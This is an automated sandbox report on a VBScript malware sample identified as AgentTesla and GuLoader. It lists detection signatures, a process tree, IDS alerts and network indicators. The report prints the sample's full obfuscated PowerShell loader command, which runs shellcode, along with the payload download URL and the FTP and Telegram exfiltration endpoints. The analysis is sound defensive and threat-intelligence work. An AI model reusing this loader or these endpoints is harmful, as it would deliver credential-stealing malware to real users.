Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name:SIEM_PO00938467648.vbs
Analysis ID:756154
MD5:633811bccf3fe62978ce41a04b653083
SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 7696 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 376 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6160 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 5484 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SIEM_PO00938467648.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 3 entries

            Sigma Signatures

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenS

            Snort Signatures

            Timestamp:192.168.11.20185.31.121.13649858212029927 11/29/22-18:34:46.981738
            SID:2029927
            Source Port:49858
            Destination Port:21
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20185.31.121.13649859597722851779 11/29/22-18:34:47.016884
            SID:2851779
            Source Port:49859
            Destination Port:59772
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJoe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.11.20:49857 version: TLS 1.2
            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49858 -> 185.31.121.136:21
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49859 -> 185.31.121.136:59772
            May check the online IP address of the machine
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
            Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Akkant/VUUby127.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49859 -> 185.31.121.136:59772
            Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49858 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145990678.000000001FBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145920354.000000001FBE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmbImL.com
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwedft.gq/Akkant/VUUby127.xsn
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ZK1g7ahAv5q7aIVR.com
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ZK1g7ahAv5q7aIVR.comXy
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: qwedft.gq
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63A09A recv,
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Akkant/VUUby127.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.11.20:49857 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo 